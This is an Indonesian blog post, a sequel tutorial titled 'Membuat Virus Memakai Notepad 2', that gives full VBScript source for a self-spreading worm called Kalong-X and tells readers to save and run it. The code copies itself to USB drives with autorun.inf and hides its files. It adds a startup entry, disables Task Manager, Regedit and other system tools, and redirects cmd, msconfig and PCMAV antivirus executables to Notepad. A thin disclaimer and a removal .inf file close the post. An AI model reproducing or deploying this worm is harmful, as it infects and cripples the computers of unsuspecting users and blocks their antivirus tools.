Selamat Datang Orang Gila !!! .:: Welcome Lunatic ::.

Membuat Virus Memakai Notepad 2

Hi…..Melanjutkan artikel yang waktu itu “BUAT VIRUS VIA NOTEPAD” kita akan membuat virus yang lebih hebat lagi. Kalau ada yang belum tahu, saya mau minta maaf karena di artikel sebelumnya ada kesalahan code. Silahkan ganti kata “rekursif” menjadi “rekur”. Kalau enggak, bisa syntax error nanti
Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….‘Kalong-X‘Varian dari Kalong.VBSon error resume next
‘Dim kata-kata berikutdim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd
’siapkan isi autorunisi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo
‘buat file indukSet windowpath = fs.getspecialfolder(0)set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)tf.attributes = 32set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)tf.write rekurtf.closeset tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inffor each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)tf.attributes =32set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)tf.write rekurtf.closeset tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)tf.attributes = 39
set tf =fs.getfile(desades.path &”\autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = fs.getfile(desades.path &”\autorun.inf”)tf.attributes=39end ifnext
‘Manipulasi Registryset kalong = createobject(”WScript.Shell”)
‘Ubah IE Titlekalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::” ‘File Hidden tak terlihatkalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD” ‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanankalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD” ‘Buat pesan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic” ‘Aktifkan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs” ‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepadkalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe” ‘Bonusif check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :[Version]Signature=”$Chicago$”Provider=Fariskhi
[DefaultInstall]AddReg=UnhookRegKeyDelReg=del
[UnhookRegKey]HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFindHKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptionsHKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRunHKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryToolsHKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgrHKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenuHKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaptionHKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeTextHKLM, Software\Microsoft\Windows\CurrentVersion\Run, SystemdirHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, DebuggerHKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Menurut anda tentang blog ini?